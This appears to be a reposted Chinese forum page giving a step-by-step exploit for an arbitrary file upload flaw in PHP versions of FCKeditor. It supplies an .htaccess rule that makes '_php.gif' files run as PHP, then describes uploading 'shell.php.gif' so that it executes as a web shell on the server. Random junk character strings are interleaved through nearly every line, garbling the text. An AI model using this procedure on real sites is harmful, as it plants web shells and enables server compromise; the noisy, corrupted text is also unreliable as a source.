FCKeditor所有php版本Upload上传漏洞+ d" |3 }1 K: ^" M
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
S g8 v! k- {5 N减小字体 增大字体8 ~1 |3 B0 [! e* l: ^8 b
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability8 ?' X8 D: h) V) P5 p r
[+] Date: 2011/ Q% Q, o! x0 h; w5 s1 V5 O: Z
[+] Author : sinesafe.cn
& O- I# y% A" r# I4 r" x! n! H[+] Website : WwW.sinesafe.cn
; S; g% t4 {: G* R' o———————————————————
3 J- S: U8 o2 p1.create a htaccess file:/ a* |- q/ L: z# D) m
code:7 f, k- A. j8 J5 r& H
<FilesMatch “_php.gif”>
2 y& H3 W; g V# G2 f. E8 H. e/ y8 HSetHandler application/x-httpd-php( c( _" {2 H- g2 P+ a/ F, [5 b
</FilesMatch>
: b9 E5 d' T* f# c7 C4 v; X
' Z, d& Y2 k2 i8 r) @9 u2.Now upload this htaccess with FCKeditor.: l5 W# M! k" Q y; f& `# X
- T8 b7 j7 c) h T0 ~: a5 n6 |
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html e/ u2 G6 E+ H* h, L: D
2 Q/ s. A7 W9 E* p) u
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html0 u5 Q7 {/ B+ o, M: K* k. \' a
& w9 q5 `! c, F& B+ ]———————————————————————————————-
( |1 F9 w( l$ \0 l3 A8 x; F9 a3.Now upload shell.php.gif with FCKeditor.8 w6 z" F0 J9 x, W: E- F8 q7 }
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
0 K7 W4 F6 K0 M" V6 X5.http://www.sinesafe.cn/anything/shell_php.gif' |, {5 W4 i* f
6.Now shell is available from server. |
+ q" y, Y$ l+ Z4 z) p2 z7 g
' V( Q( F+ E$ d! l6 L) A
9 [- q9 F* T* b- y& b; j! l |
发表于 2013-10-27 17:25:21
收藏
支持
反对